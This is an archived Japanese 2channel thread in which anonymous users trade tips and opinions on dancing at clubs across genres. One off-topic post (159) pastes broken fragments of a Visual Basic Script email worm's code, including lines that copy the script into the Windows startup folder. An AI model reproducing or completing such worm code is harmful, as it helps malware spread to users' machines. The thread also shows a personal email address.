2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

クラブやライブでの踊り方教えて下さい!! 2

1 :名無しチェケラッチョ♪:03/11/14 13:49 ID:???
引き続きどうぞ。

良スレだった前スレ

クラブやライブでの踊り方教えて下さい!!
http://music.2ch.net/test/read.cgi/dj/1008342673/

2 :名無しチェケラッチョ♪:03/11/14 13:56 ID:???
前スレもあまり書き込みペースが遅かったですが、
落ちないように保守カキコお願いします。
後、立ててからある時間まで10いかないと落ちる?のかな。


3 :名無しチェケラッチョ♪:03/11/14 14:13 ID:???
  |\    ワガママな1のために華麗に3ゲットー!!
  |  \   ̄ ̄∨ ̄ ̄ ̄ ̄
 、、、  _∧ ∧∧  
 ▽ (_` | (゚Д゚ )  パッパカパ-    (´´
      | Ю⊂)_√ヽ        (´⌒(´
     (  ̄ ∪ )^)ノ ≡≡≡(´⌒;;;≡≡≡
       @ ̄ ̄@  ≡  (´⌒(´⌒;;
        カラコロカラコロ ドドドドォーーーーーッ    (´⌒;


4 :名無しチェケラッチョ♪:03/11/14 14:29 ID:???
>>3 (・∀・)イイ!!
ありがとうございます。


5 :名無しチェケラッチョ♪:03/11/14 14:38 ID:???


6 :名無しチェケラッチョ♪:03/11/14 14:39 ID:???
>>5
ありがとうございます。
この調子で10まであともうすこしだー

7 :名無しチェケラッチョ♪:03/11/14 15:59 ID:???
レゲエとかどう踊ればいいの?

8 :名無しチェケラッチョ♪:03/11/14 19:51 ID:???
どう踊るとか考えるな 音を体で感じるんだ!

9 :名無しチェケラッチョ♪:03/11/14 21:30 ID:???
レゲエは揺れてるだけ〜

10 :名無しチェケラッチョ♪:03/11/14 21:59 ID:???
ゆらゆら揺れてばいいのか〜
ゆらゆら〜

11 :名無しチェケラッチョ♪:03/11/14 22:20 ID:OnbZ1CPS
どのジャンルのパーティーでもガシガシ踊ってる馬鹿共はHARDCOREの連中。
暴れすぎ。ウザイよ。

12 :名無しチェケラッチョ♪:03/11/15 00:00 ID:jA1Vrowq
腰フリフリ〜♪

13 :名無しチェケラッチョ♪:03/11/15 02:52 ID:vF07ZpLa
ほんと なりふりかまわず 暴れてる香具師をみると
非常に萎える。



14 :名無しチェケラッチョ♪:03/11/15 03:27 ID:???
>>9
でも一応signal di planeとかポンデリバーとか、足をこうやるやつとか、
あるじゃん。それくらいしか知らんけど。

15 :名無しチェケラッチョ♪:03/11/15 03:39 ID:???
>>11
俺は自分でガシガシ踊ってると思うんだけどあなたのいうガシガシとは
どんなガシガシ?モッシュみたいな?

16 :名無しチェケラッチョ♪:03/11/15 08:44 ID:???
>>14
あ、そーゆーのあるんですね。失礼しました。
私の場合、踊りとか習った事ないんで
そのジャンルの音に合わせて思うがままに体動かしてるって感じなんです。
なのでレゲエは揺れてます(笑)

17 :名無しチェケラッチョ♪:03/11/15 11:31 ID:Excoam2K
こう、自由に音に合わせて体揺らしたりするだけでいいってのあるけど
サルサとかスタイルあるようなのはそれに沿わないといけないのかな?
そうすると習わないといけなかったりすると楽しむまで時間かかったりしないかなー

18 :名無しチェケラッチョ♪:03/11/15 11:32 ID:???
なんかよくわからないけどIDが整っているというか・・・w

19 :名無しチェケラッチョ♪:03/11/15 11:32 ID:Excoam2K
sage入れてしまった。

20 :名無しチェケラッチョ♪:03/11/15 11:35 ID:WW1Nv9Kj
くねくね

21 :名無しチェケラッチョ♪:03/11/15 18:12 ID:???
 

22 :名無しチェケラッチョ♪:03/11/15 18:47 ID:???
考えずにただ踊ればいいんだ!

23 :名無しチェケラッチョ♪:03/11/15 22:44 ID:???
>>11
例えば、TECHNOのパーティーとかでみんな横揺れで踊ってる中、
一人跳ねてるのがHARDCOREの人?
あの人達ってTRANCEでも浮いてるよね。


24 :名無しチェケラッチョ♪:03/11/16 03:40 ID:???
浮いてるつってもみんながみんな横揺れの方が気持ち悪いよ。
おれはひとり跳ねてるやつのが見てて挙がるけどな

25 :名無しチェケラッチョ♪:03/11/16 03:54 ID:???
最近初めてHARDCOREのイベント行ってきた。
ヤヴァい・・・すげー楽しい。
気付いたら俺無我夢中で踊ってたよ。
でも後で考えてみると、他のジャンルのイベントであーゆー踊りやるとかなり浮くかもな。


26 :名無しチェケラッチョ♪:03/11/16 19:29 ID:???
なんか『ハッケー!!!!』とか叫んでるやつらがウザいんですが。

27 :名無しチェケラッチョ♪:03/11/16 20:23 ID:???
>26
おまえさんの脳内に住んでる妖精の声だろ?

28 :名無しチェケラッチョ♪:03/11/16 21:47 ID:X+Rg1mR+
まずは、直立不動で手のみ動かして無表情で踊らないと

29 :名無しチェケラッチョ♪:03/11/16 21:55 ID:???
それはPARAPARA

30 :名無しチェケラッチョ♪:03/11/16 21:59 ID:???
>>18-19
エクスコーム2000 て感じ?

31 :名無しチェケラッチョ♪:03/11/16 22:05 ID:???
前スレまだ残ってるよー
クラブやライブでの踊り方教えて下さい!!
http://music.2ch.net/test/read.cgi/dj/1008342673/

32 :名無しチェケラッチョ♪:03/11/17 12:58 ID:???
>>30
まぁそんな感じだったかなってw

33 :名無しチェケラッチョ♪:03/11/17 16:37 ID:???
28>和田さん?

34 :名無しチェケラッチョ♪:03/11/17 17:10 ID:???
エガチャン見習わないとな。高速でガクガクしてりゃサマになるよ

35 :名無しチェケラッチョ♪:03/11/17 17:16 ID:???
なんでだろ〜なんでだろ〜ってクールな踊りだと思うようになってきた最近。

36 :名無しチェケラッチョ♪:03/11/18 15:49 ID:???
ヒプホプは?

37 :名無しチェケラッチョ♪:03/11/18 15:55 ID:SU1d5i2t
クラブでの踊り方なんてあるのかなぁ。あたし、どのクラブに行っても適当に踊っているよ。しかもどのジャンルでも一緒の踊りかも‥。腰をくねくねさせるのが好き!やっぱりセクシーに踊りたいもん!みんな適当好き勝手に踊ればいいのよW

38 :名無しチェケラッチョ♪:03/11/18 17:57 ID:???
HAKKE!!!!!!!!!!!!!!!!!!!!!!!!

39 :名無しチェケラッチョ♪:03/11/18 17:58 ID:???
そんな俺はラビです。

40 :名無しチェケラッチョ♪:03/11/18 18:16 ID:???
>>37
勃起するのでやめていただきたい☆

41 :名無しチェケラッチョ♪:03/11/18 19:14 ID:???
>>37
(;´Д`)ハァハァ

42 :名無しチェケラッチョ♪:03/11/18 22:14 ID:???
hip hopは?

43 :名無しチェケラッチョ♪:03/11/19 10:21 ID:???
くねくね

44 :名無しチェケラッチョ♪:03/11/19 23:28 ID:???
ヒプホプも揺れてればいいの?くねくね

45 :くねくね女ですW:03/11/20 00:54 ID:LmyUGAL2
あたし、ヒップホップもくねくねです。腰を使います。踊り方分からないときに、他の人の踊り方を見ていて腰使いがうまい人はカッコイイなぁって思ったコトから始まりました。気持ち良く踊るコトが一番大切だと思う。あたしはくねくねが一番気持ちいいですW

46 :名無しチェケラッチョ♪:03/11/20 02:08 ID:???
>>37>>45
まずは改行を覚えろ。

47 :名無しチェケラッチョ♪:03/11/20 02:12 ID:???
携帯からだからめんどくさいんだろ

48 :名無しチェケラッチョ♪:03/11/20 09:19 ID:???
なるほどヒプホプもくねくねでいいのか〜。くねくね。
でもなんだかえろいなw

49 :名無しチェケラッチョ♪:03/11/21 18:47 ID:Yy5MHSEB
くねくねなんかいいね。

50 :名無しチェケラッチョ♪:03/11/21 19:03 ID:???
俺も昔はそうだったけど「それでは踊ってることにならない」って言われた。
だから今はブレイクダンスやムーンウォークなどをやっている。

51 :名無しチェケラッチョ♪:03/11/21 19:16 ID:???
激混みのフロアでひたすら、ドルフィン!

最近、ハウスダンスしてる人達見なくて寂しい…

52 :名無しチェケラッチョ♪:03/11/21 21:26 ID:???
混んでるのにドルフィンなんて迷惑以外の何もんでもない
周り見て踊れって

53 :名無しチェケラッチョ♪:03/11/22 15:24 ID:hHHzl1rf
俺は今20歳です。HIPHOPを通じて仲良くなった先輩に連れて行ってもらい
初めて行ったクラブがハーレムでした。それから1年ぐらいクラブに
通ったけどぶっちゃけ楽しさがわからなかった。楽しそうに踊ってる人や
友達を見ても何が楽しいんだ?っていつも思ってた。でも友達には見栄から
「クラブはマジ楽しいよ!」とか言っちゃったりして何かそんな自分が嫌
でした。でもダンス踊ってる人がかっこよく、うらやましかった俺はダンス
を習うことにした。そして今、クラブで踊るのが楽しくて仕方ない。いつも
汗だくになって踊っている自分がいます。ちょっと臭いです。でも周りの
目なんてきにならない。ぶっちゃけ俺は踊りもまだまだだけど、レッスンに
通ったことによって踊る楽しさがわかり下手でもおもいっきし踊れば気持ち
いいって感じるようになった。だから皆も周りのこと気にせず音を感じるま
まに体を動かしてみてください。一言言うとすれば手をつけるともっと気も
ちよくなれますよ!


54 :名無しチェケラッチョ♪:03/11/22 17:50 ID:???
つーかclubでの楽しさって踊ることよりも
音に入り込むことだと思うんだがナ

55 :名無しチェケラッチョ♪:03/11/22 18:07 ID:???
危ない海外板のゴアスレなかなかいいよ。
ここと同じ自由な雰囲気がある。

56 :名無しチェケラッチョ♪:03/11/22 20:48 ID:SAAkS/ZZ
おりゃジャンル問わずぶれいきんだね
クラブハウスとか広いとこでしかやんないけどね〜メーワクだから。

57 :名無しチェケラッチョ♪:03/11/22 21:18 ID:???
ジャンル別に踊り方まとめたサイトってないの?

58 :名無しチェケラッチョ♪:03/11/22 21:25 ID:zNgz3NXP
HouseとかTranceとかで踊りまくってる連中って
汗臭そう。

59 :名無しチェケラッチョ♪:03/11/22 22:36 ID:???
汗かいてても臭わないヤシもいれば、汗かいてなくても臭うヤシもいるけどな

60 :名無しチェケラッチョ♪:03/11/23 14:29 ID:???
頼むから踊り方にルールを決めて、違う踊り方してる人を非難するのは止めてくれ
クラブでまで自意識過剰になっちまいそうだ

61 :名無しチェケラッチョ♪:03/11/23 15:55 ID:???
どんな踊り方しててもいいけどさ、他人にガンガンぶつかっといて
謝りもしない奴は氏ねって思う。
自分だけよけりゃいいのかよ、痛てーよって。

62 :名無しチェケラッチョ♪:03/11/23 16:47 ID:???
このスレに来て踊り方は自由でいいというのがわかったけど
服装についても動きやすいってか踊りやすいものでいいんですよね?


63 :名無しチェケラッチョ♪:03/11/24 08:47 ID:xWySO1g0
モッシュ。

64 :名無しチェケラッチョ♪:03/11/24 12:05 ID:???
ライブで踊るのとはまた違うんですかね。

65 :名無しチェケラッチョ♪:03/11/24 15:21 ID:???
TRANCEの決まってるフリってどうやって踊るの?

66 :名無しチェケラッチョ♪:03/11/24 15:30 ID:9o8CAw6b
肩を組んだ集団が円形になって回りながら踊ってるのは脅威だった

67 :名無しチェケラッチョ♪:03/11/24 16:17 ID:xWySO1g0
そのうちダイブすんべ。さんぷろあたりで…。

68 :名無しチェケラッチョ♪:03/11/25 00:58 ID:???
Dancing Hi

69 :名無しチェケラッチョ♪:03/11/25 01:38 ID:???
>>68
そーね、踊ってると気持よくなるね。
脳内麻薬分泌しまくり。

70 :名無しチェケラッチョ♪:03/11/25 01:49 ID:eEFJQjpL
(・∀・)イイ!!dancing queen♪ dancing hi ♪
分泌しまくったもん勝ちね!!



71 :名無しチェケラッチョ♪:03/11/25 01:59 ID:???
ちなみに酒呑めないんでもっぱら水なんだけど、
水だけでそんなに気持よくなれる奴って珍しいと言われますw
ドーパミンやらアドレナリンやら出まくり〜

72 :名無しチェケラッチョ♪:03/11/25 02:26 ID:eEFJQjpL
(・∀・)イイ!!
完全自家生産ですなw

73 :名無しチェケラッチョ♪:03/11/25 03:15 ID:???
踊りってどーー覚えるの?
TRANCEとかってなかなか覚えられない。

74 :名無しチェケラッチョ♪:03/11/25 22:10 ID:???
体が自然に踊る

75 :名無しチェケラッチョ♪:03/11/26 01:01 ID:???
前スレまだ残ってるってば

クラブやライブでの踊り方教えて下さい!!
http://music.2ch.net/test/read.cgi/dj/1008342673/

76 :名無しチェケラッチョ♪:03/11/26 17:35 ID:???
前スレもう少しで埋め立て完了しまつ。

77 :名無しチェケラッチョ♪:03/11/27 17:23 ID:???
埋め立て完了しますた。
前スレ1000のAA(・∀・)イイ!!

78 :名無しチェケラッチョ♪:03/11/28 16:15 ID:???
hoshu

79 :名無しチェケラッチョ♪:03/12/01 02:36 ID:???
まとめサイトキボン

80 :名無しチェケラッチョ♪:03/12/03 04:11 ID:???
なんとなく分かってきた気がする。でも鏡で見てもなんか違うんだよなぁ

81 :名無しチェケラッチョ♪:03/12/03 23:17 ID:nsFKKXpC
この前CODEに行ったんだけど
トランスでステップしながら踊ってる人がいた。
すごく豪快にステップしてて見てる方が気持ち良かった
あれってどうやって踊るんだろう
ぐぐって調べてもトランスに決まった踊り方などありませんとか出てくるし
慣れてる人はステップしながら踊ってるし…
あれってどうやって踊るの?なんて踊り方なのか教えて下さい

82 :名無しチェケラッチョ♪:03/12/03 23:19 ID:???
おまえ 目 見えてないの?

83 :名無しチェケラッチョ♪:03/12/03 23:35 ID:nsFKKXpC
>>82
見えてないって?
視力は悪いけど…

84 :名無しチェケラッチョ♪:03/12/03 23:42 ID:???
目の前で踊ってるんだから 見て覚えるか
もしくは、話しかけて教えてもらえば済むじゃないか・・・・・・・・・

85 :名無しチェケラッチョ♪:03/12/03 23:43 ID:???
目で見てわからないのに、文章で説明してもわかるはずがない罠

86 :名無しチェケラッチョ♪:03/12/03 23:52 ID:???
そりゃそうだw

87 :名無しチェケラッチョ♪:03/12/03 23:59 ID:nsFKKXpC
それが見て覚えようと思ったんだけど
頭の回転が遅い俺には覚えられなくて…それにステップがすごく早いんだもん…

88 :名無しチェケラッチョ♪:03/12/04 00:02 ID:O343HFd8
>>81
> トランスでステップしながら踊ってる人がいた。
> すごく豪快にステップしてて見てる方が気持ち良かった

つーか そんなの餓鬼みたいなことしないほうがいい
そんなのヤッテルのギャル・ギャルヲかDQNしかいない。

89 :名無しチェケラッチョ♪:03/12/04 00:46 ID:gmT937f1
>>88
ギャルやギャル男達はルミカを持って振ってるだけだったから
あんまり悪い印象がなかったな…
逆にクラブ慣れしてる人たちがステップしながら踊ってる感じだった

90 :名無しチェケラッチョ♪:03/12/04 10:20 ID:D/tUWL7G
形に捕らわれず心のままに踊りなさい!かっこいいとか悪いとか関係なし。用は自分が気持ち良く、楽しければそれでイイのだ!

91 :名無しチェケラッチョ♪:03/12/04 15:57 ID:DiIw8q/o
そういえば前スレに「黒頭巾」ってヤシいたの覚えてるひといるかな?
結構書き込んでたんだけど、どこ行っちゃったのかな?

92 :名無しチェケラッチョ♪:03/12/04 16:09 ID:???
気持ち悪い踊りサイケェーーー!

93 :N男:03/12/04 16:45 ID:3Tt9tkDS
お初です♪宮崎にてチームを組んで踊っております
まさに>>90さんの言う通り!
イベントステージで踊るなら別ですが…
私もクラブで練習してますが、以外と見られてないっすよ?
ここぞとばかりに踊り来るってます♪
変でもひたすら踊る!人の見て、こんな感じ?で無問題!
でもさすがにうまい人が踊るとモーゼのごとく人がスペース開けます
私も行ってますが、ダンススクールって手もあります


94 :N男:03/12/04 16:51 ID:3Tt9tkDS
ちなみにうちのチームは
テックブレイキング
ってなジャンルで踊ってます
よく聞かれますがクルクル回ることはしません(>_<)

95 :名無しチェケラッチョ♪:03/12/04 17:18 ID:???
踊り狂ってる奴の回りにスペースができるのは
ぶつかると痛そうだからだ罠w

96 :名無しチェケラッチョ♪:03/12/04 22:40 ID:???
足踏み(たまに跳ねながら)
膝の曲げ伸ばし
肩、というか胸?の前後運動
腕とか腰のひねり
などの身体のいろんな部分を、それぞれリズムに合わせてやわらかく動かす
組み合わせとか動き方は、気分によって適当

自分はこんな感じなんですが、踊りがうまくなくても楽しめます
たまに見かける、全く踊りに慣れてない人のために書いてみた。

97 :名無しチェケラッチョ♪:03/12/04 22:44 ID:???
好き勝手踊ればいいんだよ。
一度、知り合いに某ディスコ無理やり連れて行かれたけど
オッサン・オバハンが3列ぐらいになって、同じ踊り
ステップとかいうらしいけど
踊ってて、メッチャきもかったw

98 :名無しチェケラッチョ♪:03/12/05 01:42 ID:IAELTZFS
ブルハのダンスナンバー聞いてください。ヒロトは言ってます、カッコ悪くたっていいよ、そんなこと笑う奴はとうふにぶつかって死んじまえと。

99 :名無しチェケラッチョ♪:03/12/05 02:07 ID:???
そうだよね。人間楽しんだ者勝ち!でもなんか気になるんだよなぁ

100 :名無しチェケラッチョ♪:03/12/05 13:56 ID:ytAUe15W
Dancing Gallaxyあげ

101 :名無しチェケラッチョ♪:03/12/05 13:57 ID:???
Sky Dancingさげ

102 :51:03/12/05 14:10 ID:???
>>52
冗談です。
ピアノが綺麗なイタロハウスとか生音系のトライバルなハウス、ジャジーなディープハウス
に朝方にかかるようなガラージ等にワンエイトのステップ踏んだりボックスやホース、etc…
にロック、カポエラ等を絡ませたり、時折り武富士系のハードジャズを芯がはっきりしてて
キレイにエロく踊ったりしたらカッコ良いだろうなぁ。
俺が女なら見とれるし惚れる。って思って始めたダンス。
今では自由に踊ってます。楽しかったら何でもいいんじゃない?
そういう音って今は少ないし、BPMも速いからね。
ただ、人にぶつかっておいて何も謝らないのはヤメテ。

103 :黒頭巾:03/12/06 01:26 ID:EBW8heDm
>91
まだ生きてますよ〜
まだ続いてるとはびっくりしました。
俺の場合特にこれといったスタイルはないんだけど
男らしく踊るっていうのは気にしてるかも。
具体的にいうと背中曲げないでできるだけ体全体を大きく見せるような動き
(ぶんぶん腕振り回したりじゃなくて周りにぶつからない程度にね)
普段行くのがテクノだから固い動き中心になっちゃうけど
たまにDJが遊びで掛けるおもしろ曲にはにやにや笑いながら動きで応えるよ
周囲の人と反応し合うっていうのもあるけど
俺の場合DJとバトルしてるような感覚かも

104 :名無しチェケラッチョ♪:03/12/06 19:12 ID:EBW8heDm
急に寂しくなったな…

105 :名無しチェケラッチョ♪:03/12/11 12:34 ID:NfDoAxUG
まぁある程度、結論というかそういうのでてるみたいだからね。
みせる踊りとは別に、自分で楽しむのに関しては自由に踊ればいいってことで・・・

でもこのスレ良スレだったし、俺は好きなスレのひとつだな。

106 :いわん:03/12/11 12:39 ID:YUSh8nup
生命保険は明治生命のLAで。かいじん21めんそう。
http://tv3.2ch.net/test/r.i/musice/1062209956/1-
http://bubble.2ch.net/test/r.i/beatles/1060815327/l50
http://school.2ch.net/lifework/i/
http://money.2ch.net/test/r.i/tax/1065193915/i

107 :自意識過剰男:03/12/11 16:23 ID:2LtMByZq
たまにいる惚れそうなくらい痺れるDancingをかましてる野郎を発見すると近くによって学ぶ 俺も踊っているので相手は気付かない それを繰り返すことによって自分の満足する踊りを完成させ踊っていても気持ちよさが違う 勿論俺の踊りでみんな上がる



と 思っていても口にしてはいけないことをカミングアウトしてみる



108 :名無しチェケラッチョ♪:03/12/11 17:05 ID:???
都内某箱でよく見かける痙攣男萌え。命を削って自分なりのグルーブを
作ろうとするかのようなあなたの踊りを見てるとすげーアガり松。

109 :名無しチェケラッチョ♪:03/12/14 21:36 ID:???
hoshu

110 :名無し:03/12/15 21:16 ID:ov7TzhEP
トランスの踊りのレッスン教室みたいのってあるのかにゃ?

111 :名無しチェケラッチョ♪:03/12/15 21:30 ID:QR3Saa55
110 あるわけねーだろ!ネタの食い方までレッスン
しろってことですか?

112 :ひーチャン:03/12/16 09:33 ID:Tc1tUsE1
51さんは、スゴク音好きなんですね!何か、あたしの好きそうなのばかり上げてたので、すごく気になりました★イロイロお話したいです(^O^)お友達になってください♪♪


113 :51:03/12/16 12:23 ID:???
51です。かなりのハウス好きです。芝浦ゴールド復活希望ですものw
こちらこそ、BPMが速い、今のご時世に遅めのハウスやダンクラが好きな人は
あんまりいないからこちらこそ、ひーチャン友達になってください。

114 :ひーチャン:03/12/17 07:06 ID:jBLPZj8F
何か、パソカラだとエラーになっちゃって書き込めなくて(;ー;)
何でだろ(泣)51さんスゴク嬉しいです♪回りに音好きな子、あまりいないカラ
イロイロ教えてもらいたいです(>_<)直で連絡取れれば光栄です(*^ー^*)

115 :ひーチャン:03/12/17 07:13 ID:jBLPZj8F
ちなみに、上で上げてた音楽とかすごくセンス良さげで興味あり2ですッ(笑)
あたしは今マデ、サイケやゴア、サイバーやエピックやテクノetc..
イロイロ来て、自分に波長が合ってるのってハウスやアンビエントじゃないカナって
最近思い始めたんで、まだ2ペー2なんです(^O^;)

116 :51:03/12/17 19:01 ID:???
ちなみに直接連絡を取るってどうすればいいかい?


117 :名無しチェケラッチョ♪:03/12/18 15:46 ID:yCPr7x42
おいおい自分で捨てアドさらせよ
男だったらシャキッとしろよな

118 :51:03/12/18 16:09 ID:???
>>117
そうですね。すいませんでした。
>>ひーチャン
combine1231@yahoo.co.jpです。

119 :名無しチェケラッチョ♪:03/12/18 16:18 ID:yCPr7x42
まぁ頑張ってください
なまあたたか〜く見守ってます

120 :ひーチャン:03/12/20 08:12 ID:/jLFBK1W
イロイロ忙しくて、これなかった(TΔT)
51さん、今カラメールしますねッ♪
↑さん、ありがとぉ★おかげで51さんと直で連絡取れそうデス◎
イロイロ学んできまぁす(*^ロ^*)

121 :51:03/12/20 14:30 ID:???
はい。メール待ってます。

122 :名無しチェケラッチョ♪:03/12/22 12:44 ID:STL/644U
俺は踊ってると首が痛くなるんですが、友達は痛くないってさ。
皆、首は動かさないようにしてるの?

123 :名無しチェケラッチョ♪:03/12/22 13:17 ID:???
頭振るよ
だから筋肉痛なる

124 :名無しチェケラッチョ♪:03/12/22 14:32 ID:???
私も首筋肉痛になる。
おもいっきし天を仰いだり、
前傾姿勢で俯いて踊ってたりするからかな。
あー、でも首も振ってるなー。∞型に。
ちなみにhouserです。

125 :名無しチェケラッチョ♪:03/12/22 20:46 ID:???
ひーちゃんの書き込みを見てひとこと。
サイバーとエピックの違いはなんですか?
わかりやすく教えてくださいww

126 :名無しチェケラッチョ♪:03/12/22 22:38 ID:???
筋肉痛になるほど踊ってみたい!!!
人の目を気にしてるわけじゃないけど、どうしても乗りきれないんです。
上手く踊れなくてもいいから普通に踊れるようになりたい・・・

127 :名無しチェケラッチョ♪:03/12/23 01:48 ID:???
>>125
そりゃ、サイケとゴアくらい違うものさ

128 :名無しチェケラッチョ♪:03/12/23 06:08 ID:???
>>125 商標か,そうでないかです

129 :122:03/12/23 21:21 ID:???
みんな首痛くなるっていうんで安心したw
俺だけだったら嫌だなぁと思ってたからね。
>>126
周りでみんな好きなように踊ってるんだし、好きなように踊ればいいと思う。
わざわざ筋肉痛になる必要も無いし、ゆらゆら踊るのもいいと思うし。
家で好きな曲聴きながら、目をつぶって適当に踊ってみるのもいいかも。音を楽しみながらね
ずーっと踊ってれば筋肉痛にはなれるかなぁと…

130 :名無しチェケラッチョ♪:03/12/24 04:08 ID:???
マンガ昴の、3巻の後半読んでみれ。
おもしれーぞー。
クラブダンスの参考にもなると思う。

131 :名無しチェケラッチョ♪:03/12/24 22:33 ID:???
参考資料:中国人の踊り方
ttp://fpj.peopledaily.com.cn/2002/07/11/jp20020711_19058.html

132 :名無しチェケラッチョ♪:03/12/30 21:29 ID:???
hoshu

133 :名無しチェケラッチョ♪:03/12/31 11:20 ID:???
>129
>126ですがレスありがとう!今日カウントダウン行きます。
楽しく踊れるといいなぁ

134 :名無しチェケラッチョ♪:04/01/01 00:11 ID:???
あけおめ 今年も楽しく踊るぜ

135 :名無しチェケラッチョ♪:04/01/08 21:27 ID:5/KSMXsa
腰フル

136 :名無しチェケラッチョ♪:04/01/08 22:05 ID:Xxcuy7RY
俺も最初クラブ行った時、どう踊って良い
のか悩んだよ。
でもフロアーにクモみたいに踊ってる人が
いて、その人見てたら何でもアリだと吹っ
切れた。

137 :名無しチェケラッチョ♪:04/01/08 22:27 ID:???
初めてクラブに誘われた時とても鬱だった。
肩と膝の関節に障害があってうまく動かないから…
でも行ってみると皆バラバラのテンポで踊っていて
それ見て不自由なりに体動かしていたら気持ちよくなってきた。
侮蔑的な目で見る人はいなくてクラブ通いが始まった。

138 :名無しチェケラッチョ♪:04/01/09 05:53 ID:???
自分も踊るってどういうこと?みたいにかまえてたけど、最近
自然に好きな音楽だと体が動くようになりました。
今ではMD聞きながら靴はいて家で踊ってみたりして、それを鏡で見て
どんな感じかナルシストみたいですが見ています。
クラブが苦手なら好きなミュージシャンのライヴに行くってのもいいかも。
私はそれで自然に踊ってて踊れるようになったので、参考までに。

139 :名無しチェケラッチョ♪:04/01/10 01:55 ID:???
ハピコアとガバ系によく行くんですが、
とにかく痙攣しまくってわめきまくってるか
両手あげて飛び跳ねてます。

スピコアは、みんなで暴れまわってます。BPM600で。

140 :名無しチェケラッチョ♪:04/01/10 23:09 ID:???
ほっしゅ

141 :名無しチェケラッチョ♪:04/01/12 12:28 ID:???
悪いことした経験あるやつは吹っ切れやすい。と思う。
だって仕方ないでしょ。みたいな

142 :名無しチェケラッチョ♪:04/01/14 23:51 ID:???
hoshu

143 :名無しチェケラッチョ♪:04/01/15 22:06 ID:???
sage

144 :名無しチェケラッチョ♪:04/01/17 02:29 ID:???
age

145 :名無しチェケラッチョ♪:04/01/17 09:03 ID:???
大勢でclub逝った時にジェンカを踊ってみる。
周りからヒンシュク買うが楽しかったりする・・・・。

146 :名無しチェケラッチョ♪:04/01/19 19:35 ID:???
age age

147 :名無しチェケラッチョ♪:04/01/19 19:37 ID:???
楽しく踊るのはいいけどドリンクには気をつけてください。
この前思いっきりビールが服にかかった。
悪気はないから別に何も言う気はないけど、まわりのことも少しくらいは気にしながら楽しく踊ってほしいですね

148 :名無しチェケラッチョ♪:04/01/20 00:45 ID:???
激しくピストンこれ基本

149 :名無しチェケラッチョ♪:04/01/20 00:58 ID:???
クラブでは本人に文句言う気はなくても2chでは名無しに愚痴るわけですね

150 :名無しチェケラッチョ♪:04/01/20 02:46 ID:???
そうですが何か?

151 :名無しチェケラッチョ♪:04/01/20 19:17 ID:v/0IonQO
トランスの曲で振り付けがあるやつを覚えたいんですが、
クラブ通って、見よう見まねで覚えるしかないですか?
コア行った時、ふりについていけなくて、さみしかったです(;_;)

152 :名無しチェケラッチョ♪:04/01/20 20:02 ID:0aWq1GiG
>151
釣れますか?

153 :名無しチェケラッチョ♪:04/01/20 21:59 ID:WgLMj6+0
151さん 糸が太すぎでばればれですよ!

154 :名無しチェケラッチョ♪:04/01/20 23:08 ID:aiJOjZBH
パラパラ

155 :名無しチェケラッチョ♪:04/01/26 20:09 ID:fFKSPrOr
age

156 :なんつうのか:04/01/26 21:16 ID:???
サイケのパーティでツイスト踊ってる奴みたことあるけど
ある意味かっこよかったよ


157 :名無しチェケラッチョ♪:04/02/05 08:08 ID:0ygVJNUF
10日に横浜でやるDetox行く人いないかな?
ぶりぶりデトロイトベースで踊り狂いに行きまーす

158 :名無しチェケラッチョ♪:04/02/05 12:05 ID:???
どなたか、あの踊り方。分かりやすく解説してみて下さい。
3歩進んで2歩下がるようなヤツです。跳ねてる感じのヤツです。
人のをジロジロ見て研究しちゃ悪いと思って。

159 :名無しチェケラッチョ♪:04/02/05 12:30 ID:???
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
VBS.Network.E
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
VBSInternal
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
VBS Freelink.B
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)


160 :名無しチェケラッチョ♪:04/02/06 20:28 ID:rDZYGI1k
>>139
漏れもGABBAヲタでよくGABBAのパーティ逝くよ。
ああいうパーティに来てる連中ってホント、めちゃくちゃ暴れるっていうのがしっくり
くる気がするよ。漏れも便乗して叫んだりモッシュに参加したりしてるけどさ。

スピコアは、客が疲れてきたときにかかると、逆にみんなポカーンとしたりすることもあるよな。(藁
ちなみに>>139よ、bpmいくつくらいまでステップ踏める?
漏れ270が限界。ステップつーか跳ねるのに近くなるけど。
300超えたらブルブル痙攣してるよ。

161 :139:04/02/07 00:39 ID:???
>>160
おぉ仲間。君が関東に住んでるなら絶対どこかで会ってる。w

ステップはBPM300まではなんとか踏めるよ。
まぁいつも喚きながら痙攣してるけど。


HARDCOREはフロアの一体感が最高だよな。
本当にこのジャンルに出会えて良かったと思う。

162 :名無しチェケラッチョ♪:04/02/07 07:47 ID:???
>>160
>>139
BPM300って神ですか?
「レイバー」で言うと「デストロ」の人達って速いの好きだね。
レイバーの事嫌いだったらごめんよw

163 :139:04/02/07 12:36 ID:???
普段HARDCOREしか行かないのでこの前初めてTRANCEに行ったら
かなり浮いた。
ハピコアやGABBAみたいにガシガシ踊るジャンルは無いのかな?

164 :名無しチェケラッチョ♪:04/02/07 23:28 ID:???
オマエラ凄すぎ

165 :名無しチェケラッチョ♪:04/02/08 02:23 ID:???
HARDCOREはバカばっかり

166 :大阪の某箱では:04/02/09 11:45 ID:4wrEScIg
サイケイベントなのにブレイクダンスチックなやつがいる。
あれはいただけないな

167 :名無しチェケラッチョ♪:04/02/09 23:43 ID:???
週末Reggaeのイベントで踊り過ぎておしりが筋肉痛…。
イタイ。

168 :名無しチェケラッチョ♪:04/02/14 07:23 ID:???
人の踊り方にケチつけんな!

169 :名無しチェケラッチョ♪:04/02/16 18:47 ID:nuQaioZz
age

170 :名無しチェケラッチョ♪:04/02/17 02:25 ID:IICm4S9L
レゲーダンサーのセクシー姉ちゃんって何であんなに小刻みに腰やお尻振るのに
あんなに腹がたぷたぷしてるんだ? もちろんミンナがみんなそうじゃないけど。
頭で体支えて開脚する時ソノ腹の肉あと少しなかったらモット華麗に足上がるんじゃないかな
と心配してみる厨房です。

171 :名無しチェケラッチョ♪:04/02/20 01:54 ID:QHZBGyhi
レゲエダンスのビデオとかってどこに売ってるの??
誰か教えて!!

172 :名無しチェケラッチョ♪:04/02/20 12:44 ID:u4Usu7jJ
>151
そんな教室あってもいかねーだろw



173 :名無しチェケラッチョ♪:04/02/20 19:27 ID:z0ncDlYr
最近レゲエにはまってますー。
